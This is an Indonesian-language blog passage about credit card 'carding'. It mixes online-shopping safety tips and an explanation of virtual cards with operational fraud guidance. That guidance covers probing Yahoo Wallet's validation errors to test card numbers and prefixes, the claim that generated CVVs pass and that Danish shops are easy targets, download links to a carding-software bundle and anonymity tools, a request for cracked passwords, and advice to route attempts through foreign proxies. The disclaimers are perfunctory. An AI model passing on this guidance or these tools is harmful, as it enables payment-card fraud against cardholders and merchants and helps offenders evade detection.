Data yang saya coba masukkan sebagai contoh adalah nomor yang sudah expire. Dan sengaja saya melakukan sebuah kesalahan dengan memilih kartu MasterCard, padahal sebenarnya ini Visa.
Tujuan saya adalah untuk menunjukkan kepada Anda, bahwa sebuah kesalahan bukan berarti kegagalan. Sekarang Anda klik tombol continue. Hasilnya biasanya akan berupa pesan seperti:
Please correct the following problems:
- Credit Card Number (MasterCard numbers need to start with the number 5)
Please correct the following problems:
- Credit Card Number (Discover Network numbers need to start with the number 6011)
Please correct the following problems:
- Credit Card Number (American Express numbers need to be 15 digits)
- Credit Card Number (American Express numbers need to start with the number 3)
Kartu kredit MasterCard dimulai dengan angka 5. Jadi, hal ini bisa diujicobakan untuk jenis kartu lainnya, boleh dibilang ini adalah salah satu metode untuk mengetahui prefix, yang sudah dibahas sebelumnya.
Apabila yang muncul pesan invalid, error seperti pada contoh berikut, maka itu berarti kartu tersebut tidak dapat digunakan.
Unfortunately, there was a problem.
- Invalid credit card number or type, please check and try again.
There is an error with the payment method information. Please check the information and re-enter it or use another payment method. If the problem persists, please contact Yahoo! Customer Care.
Bisa juga seperti berikut:
The payment method was not added. Please re-enter the information.
Apabila nomor kartu kredit tersebut diterima maka akan muncul pernyataan sukses.
Berikutnya, data tersebut dapat dilakukan proses Edit untuk perubahan atau pun Delete untuk menghapusnya.
Untuk kasus tertentu, misalnya nomor kartu kredit yang diperoleh melalui CC Generator digunakan dengan memasukkan data pemilik sembarangan.
Masih berhubungan dengan validasi kartu kredit, sekalian saja akan saya jelaskan bahwa ada banyak tools yang digunakan untuk mencari CVV sebuah kartu kredit. Tapi kebanyakan dari tools tersebut memberikan nomor CVV yang salah. Sebab setelah dicoba dengan menggunakan kartu kredit saya yang asli, ternyata kebanyakan nomornya salah. Walau demikian, pada beberapa pengujian yang telah dilakukan seperti menggunakan Yahoo Wallet di atas, CVV tersebut tetap dapat diterima oleh situs tersebut.
Berhati-hatilah Anda, apabila mencoba menggunakan berbagai program/software yang berhubungan dengan kartu kredit, karena dalam banyak kasus, sebagian besar dari tools/software tersebut disisipi trojan.
LAIN-LAIN YANG PERLU ANDA TAHU.
Selain permasalahan enkripsi dan pengaturan database, dalam aksinya para carder sering menggunakan proxy untuk menyembunyikan dirinya dari pendeteksi sehingga tidak mudah terlacak. Hal ini juga sudah pernah dibahas dalam artikel pada bagian awal-awal.
Sekedar tambahan, mengenai enkripsi, jika Anda memerlukan enkripsi untuk RC4, Anda bisa menuju pada link berikut:
http://www.scgi-bin.info/RC4.asp
TIPS AMAN ONLINE SHOPPING.
Tips untuk berbelanja online secara aman ini saya kutip dari Komisi Perdagangan Amerika:
- Selalu perhatikan kebijakan sebuah situs, apakah mereka akan memberikan atau menjual informasi Anda kepada pihak ketiga atau tidak.
- Simpanlah informasi pribadi milik Anda.
- Rahasiakan password Anda.
- Jika ragu tidak mendapatkan barang dari situs yang tidak jelas, jangan bayar menggunakan kartu kredit. Dan apabila ada kejanggalan dalam tagihan kartu kredit Anda, segera konfirmasikan dengan pihak bank.
- Periksalah kebijakan pengiriman dan pengembalian perusahaan tersebut.
- Pastikan bahwa bertransaksi pada situs tersebut aman sebelum membeli barang apapun.
Untuk melengkapi tips tersebut, saya tambahkan beberapa tips lainnya yang juga penting untuk diperhatikan:
- Sebisa mungkin pastikan dimana lokasi fisik toko tersebut berada, baik alamat dan nomor teleponnya.
- Berhati-hatilah saat Anda diminta memberikan informasi pribadi, seperti nomor kartu kredit, nomor rekening bank, nomor KTP, nama ibu kandung, dan sejenisnya.
- Untuk toko online, perhatikanlah sistem keamanan yang mereka miliki. Menurut pengalaman, biasanya toko yang baik menggunakan sistem keamanan yang ketat. Salah satu indikatornya adalah dengan memperhatikan alamat web-nya. Protokol https:// lebih aman ketimbang yang http:// (s pada bagian https berarti Secure).
- Jika Anda memiliki pengetahuan yang baik mengenai komputer, perhatikan pula sertifikat digital yang dimiliki oleh situs tersebut.
- Carilah informasi nama ekspedisi yang biasa digunakan untuk pengiriman barang oleh toko online tersebut. Biasanya situs palsu akan mengaku bahwa mereka menggunakan ekspedisi ABC dan sudah menjadi pelanggan tetap. Sebaiknya Anda mencoba menghubungi pihak ekspedisi ABC tersebut apakah benar toko online yang dimaksud telah bekerjasama dengan mereka.
Khusus bagi Anda para pemilik toko online (dalam hal ini adalah yang jujur), sebisa mungkin Anda pun menerapkan sebuah aturan yang jelas, untuk menghindari tindakan para carder. Contohnya adalah pengiriman barang akan dilakukan setelah uang diterima.
Jika toko online Anda bekerjasama dengan pihak lain untuk menerima pembayaran dalam bentuk kartu kredit, pastikanlah bahwa perusahaan tersebut memiliki sistem keamanan yang baik dan dapat dipercaya. Terakhir, sering-seringlah melakukan audit terhadap sistem yang Anda miliki. Dan jangan lupa sebuah aturan kuno, sering-seringlah mengupdate aplikasi online shopping yang Anda gunakan.
CC VIRTUAL.
Pada bagian awal telah disinggung mengenai CC Generator, sekarang ada lagi istilah yaitu CC Virtual. Nah, ayo apa maksudnya?
CC Virtual adalah singkatan dari kartu kredit virtual. Sebenarnya ini adalah salah satu metode untuk pengamanan kartu kredit sewaktu berbelanja online. Hal ini pula yang menyebabkan mengapa ada kartu kredit yang kelihatan masih fresh ternyata sudah tidak bisa digunakan lagi. Hal ini juga sekaligus sebagai jawaban tambahan mengapa ada nomor kartu kredit yang tidak valid saat digunakan, walaupun masa pakainya masih lama dan datanya lengkap.
Prinsip kerja CC Virtual akan saya jelaskan sebagai berikut:
User melakukan Sign-Up dan mengakses kartu kredit milik perusahaan situs tersebut. Selanjutnya user memasukkan data-data, seperti jumlah uang dan validitas pembayaran. Kemudian perusahaan membuatkan sebuah kartu kredit sekali pakai yang hanya sah untuk satu kali transaksi saja (CC Virtual). Selanjutnya user menggunakan kartu kredit virtual tersebut untuk melakukan transaksi. Setelah data diterima oleh pihak toko online, maka mereka mengirim verifikasi pada perusahaan penyedia kartu kredit virtual milik user. Setelah transaksi berhasil dijalankan, maka nomor kartu kredit virtual yang telah digunakan tersebut dimusnahkan, sehingga walaupun ditemukan oleh para carder sekalipun nomor itu sudah tidak bisa dipakai lagi. Nomor kartu kredit virtual tersebut akan berbeda untuk setiap kali transaksi.
Nomor yang sudah digunakan tersebut banyak ditemukan melalui file log oleh carder. Teknik ini pula yang menyebabkan banyak carder yang tertipu karena walau sudah capek-capek berusaha mengais-ngais database di internet, tetapi kartu kredit yang ditemukan tidak bisa dipake. (Kapok, syukurin, siapa suruh jadi maling! Kacian deh, lo...)
Sebenarnya kalau teknik di atas gagal, para carder biasanya tidak mudah putus asa. Mereka bisa mencoba menggunakan berbagai software carding, maupun credit card generator. Walau banyak situs e-commerce di Amerika, Eropa maupun Australia yang menolak credit card hasil generator beserta CVV-nya, namun ternyata masih ada beberapa situs e-commerce di Denmark yang dengan mudah ditembus dengan menggunakan Credit Card Generator maupun aneka tools carding. Ini menurut pengakuan beberapa hacker dan carder asal Rusia dan bekas negara-negara Eropa Timur lainnya. Mengenai kebenarannya, Wallahualam (tidak ada yang tahu), karena penulis tidak pernah mencobanya. Bagi yang pengin mencoba, silakan saja, namun resiko Anda tanggung sendiri. Tulisan ini hanyalah sekedar ilmu pengetahuan saja untuk diketahui, dan bukannya untuk disalahgunakan. Untuk yang tertarik untuk mendownload aneka software carding, Anda bisa mendownloadnya di link yang saya sediakan di bawah ini. Bagi yang punya aneka software lainnya, Anda bisa share dengan para pembaca yang lain dengan menuliskan link downloadnya di bagian komentar dari artikel ini. Software-software buatan komunitas underground memang begitu banyak dijumpai di pasaran, namun biasanya update nya cepat sekali, dan banyak diantaranya yang berbayar. Salah satu software yang ada dalam bundle software yang saya dapatkan ini ternyata ada yang masih belum bisa digunakan karena masih harus memasukkan password di dalamnya (yang hanya bisa digunakan dengan membeli password dari pembuatnya). Bagi yang bisa mengcrack atau menemukan password yang tepat untuk membuka salah satu software tersebut, silakan Anda share di bagian komentar dari artikel ini. Selamat belajar dan mempelajari kinerja aneka software berikut:
Link download software carding ada di:
http://www.ziddu.com/download/1857011/CARDING_SOFTWARES.zip.html
Bila Anda nekad untuk melakukan uji coba mengenai kehandalan software-software di atas dan menerapkannya di berbagai situs e-commerce, khususnya yang berada di negara Denmark, sebaiknya Anda menggunakan proxy dari negara lain, sehingga Anda akan lebih aman, dan terlebih lagi agar tidak mencemarkan nama negara kita, Indonesia, yang sudah tercemar begitu rupa. Bukankah Anda mencintai negara ini, kalau begitu jangan cemari nama baik negeri ini dengan tindakan tercela.
Atau bila Anda kesulitan menemukan proxy yang bagus, Anda bisa mencoba menginstal software-software anonymous surfing berikut ini, yang bisa Anda download, lalu Anda install di komputer Anda. Tindakan hacking Anda akan lebih aman dan terkendali. :)
Berikut link download software bundle anonymous surfing yang bisa Anda download:
http://www.ziddu.com/download/1865627/ANONYMOUSSURFING.zip.html
Tapi sekali lagi, tidak disarankan, karena kalian harus tahu bahwa kegiatan carding dan hacking itu lebih banyak dosanya daripada manfaatnya. Lagi pula Indonesia sudah tercemar namanya karena mayoritas carder dan hacker yang mengoprek jagat maya berasal dari Indonesia, Cina dan Rusia. Weleh weleh weleh...
Makanya, kalo cari duit yang halal, misalnya ikutan aneka program afiliasi atau PPC di internet yang seratus persen duit yang diterima bakalan halal, barokah dan toyibah, ya nggak?